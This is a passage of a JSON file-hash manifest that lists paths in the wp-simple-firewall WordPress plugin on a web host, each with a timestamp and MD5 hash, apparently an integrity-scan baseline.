gins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Exception\\/ExceptionInterface.php\":{\"d\":1567917024,\"h\":\"6d19725e88fa202953264f14f9e1bcf8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Exception\\/NotFoundResourceException.php\":{\"d\":1567917024,\"h\":\"8c7bff66a9500b10fb4d13e1d07e76c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Exception\\/InvalidResourceException.php\":{\"d\":1567917024,\"h\":\"178abc46cb8060f081ef43fd5ff00da5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Extractor\\/AbstractFileExtractor.php\":{\"d\":1567917024,\"h\":\"2e500eed3041541d121d895f230d309f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Extractor\\/ExtractorInterface.php\":{\"d\":1567917024,\"h\":\"b65b570d376f3a8080527c94e19e2e24\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Extractor\\/ChainExtractor.php\":{\"d\":1567917024,\"h\":\"ae7e39e6605d8692a31a5f53bd4c8b09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/schema\\/dic\\/xliff-core\\/xml.xsd\":{\"d\":1567917024,\"h\":\"ff48d862939acfe7dc34e2f8df8b14f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/schema\\/dic\\/xliff-core\\/xliff-core-1.2-strict.xsd\":{\"d\":1567917024,\"h\":\"fd528a896f7c6792b370930f64e58a2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/schema\\/dic\\/xliff-core\\/xliff-core-2.0.xsd\":{\"d\":1567917024,\"h\":\"afaefe3417450787b59d5a1d4ad1b387\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/IcuDatFileLoader.php\":{\"d\":1567917024,\"h\":\"61425c9fce12f29ee3e980cb6f2e3716\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/PoFileLoader.php\":{\"d\":1567917024,\"h\":\"0cfd5d44b60f9490f7c6078f104de708\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/LoaderInterface.php\":{\"d\":1567917024,\"h\":\"2b547625f528a20bd422ee0429b2c096\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/XliffFileLoader.php\":{\"d\":1567917024,\"h\":\"346eb8a4934cc45f0674d2dc1bcab6cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/CsvFileLoader.php\":{\"d\":1567917024,\"h\":\"81b2191d598b8135642c04cab31843d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/JsonFileLoader.php\":{\"d\":1567917024,\"h\":\"21f4dcd6f9d24d76122883e19a987c8b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/MoFileLoader.php\":{\"d\":1567917024,\"h\":\"aa8e4bcb4d759e65d0b656bd4dafdc58\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/IcuResFileLoader.php\":{\"d\":1567917024,\"h\":\"0a8d0479ccef83715badd721f8633d13\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/ArrayLoader.php\":{\"d\":1567917024,\"h\":\"0fcc04642dc31425d3bb8210058250b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/PhpFileLoader.php\":{\"d\":1567917024,\"h\":\"95819dd66e35b888e3c17140d68d750e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/YamlFileLoader.php\":{\"d\":1567917024,\"h\":\"e7fa447b653cea9424ed81b3e717728f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/IniFileLoader.php\":{\"d\":1567917024,\"h\":\"fbded93c3e6686831fa3a59517959500\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/FileLoader.php\":{\"d\":1567917024,\"h\":\"22ab04603c46a57429b8b2dc7b55670f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Loader\\/QtFileLoader.php\":{\"d\":1567917024,\"h\":\"97f0a44f233646b51f69c339adcdbe91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Util\\/ArrayConverter.php\":{\"d\":1567917024,\"h\":\"760a91d7151f64c7be7b235d7b3a6f67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/PhpFileDumper.php\":{\"d\":1567917024,\"h\":\"24ad0f4f1dbab93f8a1b9518d82354b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/FileDumper.php\":{\"d\":1567917024,\"h\":\"bf0349f96f30f2b3263b261bb97199a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/IniFileDumper.php\":{\"d\":1567917024,\"h\":\"fe09a158708cc65d0d8e59d985f26659\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/IcuResFileDumper.php\":{\"d\":1567917024,\"h\":\"2ff2e8244a772738600741825df20481\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/QtFileDumper.php\":{\"d\":1567917024,\"h\":\"2290b6c7bf3621a97d4c3f0e7f826ea0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/JsonFileDumper.php\":{\"d\":1567917024,\"h\":\"64887a32d3eff7be174ff57a38aba6cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/PoFileDumper.php\":{\"d\":1567917024,\"h\":\"7d787a6a138f144732b3a2985fa7ca0b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/DumperInterface.php\":{\"d\":1567917024,\"h\":\"97df468b756ed060c2d9002ffb331f4c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/XliffFileDumper.php\":{\"d\":1567917024,\"h\":\"99f45c9fb7687f8ecf03ab3446845ffd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/CsvFileDumper.php\":{\"d\":1567917024,\"h\":\"c9840f2f28f75c9256bac874b4052ba6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/MoFileDumper.php\":{\"d\":1567917024,\"h\":\"4a95b5780b961a2227458bb073a7b64f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Dumper\\/YamlFileDumper.php\":{\"d\":1567917024,\"h\":\"1b2140268b8238dd3d7f5e45749e0f59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Catalogue\\/DiffOperation.php\":{\"d\":1567917024,\"h\":\"a900225c9a0442ec08f6e327a5be8595\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Catalogue\\/AbstractOperation.php\":{\"d\":1567917024,\"h\":\"762e32be206efb97bf8093413d54aa2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Catalogue\\/TargetOperation.php\":{\"d\":1567917024,\"h\":\"1b9dc4163f2ce5154e162fddc9fa2346\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Catalogue\\/OperationInterface.php\":{\"d\":1567917024,\"h\":\"7e69e361e2d094ec4d8c1db32849b5a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Catalogue\\/MergeOperation.php\":{\"d\":1567917024,\"h\":\"9e841b4c2400b9ac25975ed7ed7238f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Writer\\/TranslationWriter.php\":{\"d\":1567917024,\"h\":\"4e840912bf8382cfefa7ad663b07bba4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/MessageCatalogue.php\":{\"d\":1567917024,\"h\":\"942d93c6aeecc83e879efc86af7e2382\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Interval.php\":{\"d\":1567917024,\"h\":\"d700e492948170fb1a905e3e838057cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/LoggingTranslator.php\":{\"d\":1567917024,\"h\":\"7ba6d803e5809ea61fcc81f24b366d75\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/MessageSelector.php\":{\"d\":1567917024,\"h\":\"3cf57db79ccb386115134f1acc75f1ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/TranslatorInterface.php\":{\"d\":1567917024,\"h\":\"0fe3e283baf302de2244008ee027eed3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/MetadataAwareInterface.php\":{\"d\":1567917024,\"h\":\"ba4a99528afbf00d106cf58a2c93aced\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/TranslatorBagInterface.php\":{\"d\":1567917024,\"h\":\"f228cb535cff48696f2facd234a1889a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/DataCollectorTranslator.php\":{\"d\":1567917024,\"h\":\"435a970dab3ecdfe926ee008a28a6966\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/MessageCatalogueInterface.php\":{\"d\":1567917024,\"h\":\"f7751f15bcb60d99ecaac963118b8d5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/IdentityTranslator.php\":{\"d\":1567917024,\"h\":\"c2692ce0d0b1e27a0b3f2c654e0f8b7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/Translator.php\":{\"d\":1567917024,\"h\":\"58b790eba0417a3875e5c974039b1b96\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/PluralizationRules.php\":{\"d\":1567917024,\"h\":\"41273d3de6ce7d35a0e521fbda44b813\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-ctype\\/bootstrap.php\":{\"d\":1567917024,\"h\":\"638f69786aaefa6c38c98251a50bb9bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-ctype\\/Ctype.php\":{\"d\":1567917024,\"h\":\"72cb4d141eac1392c3de359dba4d44e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/autoload.php\":{\"d\":1567917024,\"h\":\"22c3f555445a2aeca5eeaed19e69d0c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Utilities\\/ReCaptcha\\/TestRequest.php\":{\"d\":1567917024,\"h\":\"adfff801ff8919fb22017360a1c87b1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Utilities\\/ReCaptcha\\/WordpressPost.php\":{\"d\":1567917024,\"h\":\"8ad8deec06a8b4a9f9398aebf933c4bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Utilities\\/AdminNotices\\/NoticeVO.php\":{\"d\":1567917024,\"h\":\"763644277800bc940f914d4baf12623c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Utilities\\/AdminNotices\\/Controller.php\":{\"d\":1567917024,\"h\":\"2ab934240673fe1d48bc3c6f54d40cf2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Utilities\\/VisitorIpDetection.php\":{\"d\":1567917024,\"h\":\"fa45e06dd4a537a413bb712181d6f87f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Tests\\/VerifyUniqueEvents.php\":{\"d\":1567917025,\"h\":\"4b0af1580b249f5f318d73b122b6e446\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Tests\\/VerifyConfig.php\":{\"d\":1567917025,\"h\":\"b135d444d06ad1c0ae6b7e6f4a752ce7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/License\\/EddLicenseVO.php\":{\"d\":1567917024,\"h\":\"2ce6b7e59386fc41df64c063077a6c4c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/AuditTrail\\/Auditor.php\":{\"d\":1567917024,\"h\":\"e95e1ee7c55d5d9cc0d310ad70c25787\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Comments\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"4524ce3c4a96bd92e79f75805a0543f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Comments\\/Delete.php\":{\"d\":1567917024,\"h\":\"1e044d15256b24f34848effd4d52e12d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Comments\\/Select.php\":{\"d\":1567917024,\"h\":\"4c8f682bfae2f07c0418f0959ef0ae78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Comments\\/Insert.php\":{\"d\":1567917024,\"h\":\"5b90658823d9487fcfeac8365b02368e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Comments\\/Handler.php\":{\"d\":1567917024,\"h\":\"c0fdb3280ec241282e9ce3f0976fb5c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"91cd7b94667d83dac2aa5dcce0398c3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/Delete.php\":{\"d\":1567917024,\"h\":\"f7ef14164dacf65e111b6c823b54aa6e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/Select.php\":{\"d\":1567917024,\"h\":\"15fbcc070031d6f772ea49f1a6cc3372\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/Update.php\":{\"d\":1567917024,\"h\":\"e1a5eb71f7f0c7e5ebf4f9f804e47d2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/Insert.php\":{\"d\":1567917024,\"h\":\"61ec8d45813984de5d68005ec65c3777\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/ChangeTracking\\/Handler.php\":{\"d\":1567917024,\"h\":\"45ae91c63e51434f30d59345f7b3e24c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"1cd27f10e7937e2d68539290e29592a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/Delete.php\":{\"d\":1567917024,\"h\":\"170b84b1912be2899dbdebae74fe0644\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/Select.php\":{\"d\":1567917024,\"h\":\"0d4ac63392fa4fe706c3ec35f4b2fe88\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/Update.php\":{\"d\":1567917024,\"h\":\"92f3104d7bdc686a13f46a8e045ef8c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/Insert.php\":{\"d\":1567917024,\"h\":\"f6d93bb3dc3381c0c89085f1a3e0ab6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/Handler.php\":{\"d\":1567917024,\"h\":\"6ffa679929b8e7398d2f5248da2344bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/IPs\\/CommonFilters.php\":{\"d\":1567917024,\"h\":\"d127bd101284f0eac3b4346dfb80d2b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"7b7bf9486ce017ce469ab9fdc17ec2df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/Delete.php\":{\"d\":1567917024,\"h\":\"1dd10e9f266ced81d2ca5f0c4c41716f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/Select.php\":{\"d\":1567917024,\"h\":\"ac8352f66f6b6be31bc1312e8fa6888e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/Update.php\":{\"d\":1567917024,\"h\":\"e146c94cd4eeff87db62cad8156e4b50\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/Insert.php\":{\"d\":1567917024,\"h\":\"1bfa9b57e3aa6cfbe7c7c033063078ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AuditTrail\\/Handler.php\":{\"d\":1567917024,\"h\":\"a6625d753f7f7810c56237ad2410a317\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"1758b71220f350a451530f059de72d5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/Delete.php\":{\"d\":1567917024,\"h\":\"343d1b965b5aa6225b9d80d41c7a209b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/Select.php\":{\"d\":1567917024,\"h\":\"00a053094e589576dd42a531b6fc8376\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/Update.php\":{\"d\":1567917024,\"h\":\"3f989cf6b6401fe99e67b82b6a230930\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/Insert.php\":{\"d\":1567917024,\"h\":\"dd7b2759c5d05cd6de23a9893e8bffb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Events\\/Handler.php\":{\"d\":1567917024,\"h\":\"f9aef67c5f3d315a3df95ed5ea252c1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"27cc3e497f08c3042269f3fb8f1f7a61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/Delete.php\":{\"d\":1567917024,\"h\":\"87ce704b4aecf1455e5a678d7e1fa9cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/Select.php\":{\"d\":1567917024,\"h\":\"b65c26f42d800659a021e487dd89e812\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/Update.php\":{\"d\":1567917024,\"h\":\"ce7fdec1452efe4c89963dc7c73a1300\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/Insert.php\":{\"d\":1567917024,\"h\":\"e5d881d49ed67f63709d342294a06324\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/Handler.php\":{\"d\":1567917024,\"h\":\"85aaf5e053acea5341858fc06b629fba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/BaseQuery.php\":{\"d\":1567917024,\"h\":\"2d394806ef98bd9071a32e5ec901fbda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Base\\/HandlerConsumer.php\":{\"d\":1567917024,\"h\":\"265837ac3166070197819fd5bf8f19b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"a65e225322fa3b10a18a904d4de25f6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/Delete.php\":{\"d\":1567917024,\"h\":\"62894c3f03831ab1b23eddd39fe2e926\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/Select.php\":{\"d\":1567917024,\"h\":\"06249e0ecb77b83a8c116c0dbd0cd98d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/Insert.php\":{\"d\":1567917024,\"h\":\"82c68b7eed499bd538182ea07a63815f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/Handler.php\":{\"d\":1567917024,\"h\":\"1f92ac66191cc1b02d2e3c4d70f10a2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/GeoIp\\/BaseGeoIp.php\":{\"d\":1567917024,\"h\":\"b28e7b4c83c7bcdaa10c1c845ef03361\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"09154fc9583c9fa5b28cab65f7f1f570\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/Delete.php\":{\"d\":1567917024,\"h\":\"75e16c7a0852337d5b804623f1efa141\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/Select.php\":{\"d\":1567917024,\"h\":\"00a83ba7137ee41b1914bd37e3b09a54\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/Update.php\":{\"d\":1567917024,\"h\":\"2c66f54b87d00df856a012f433258952\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/Insert.php\":{\"d\":1567917024,\"h\":\"46efcdf54db81d6538b462f83a517404\"},\"\\/home2\\/zphiblgz\\/public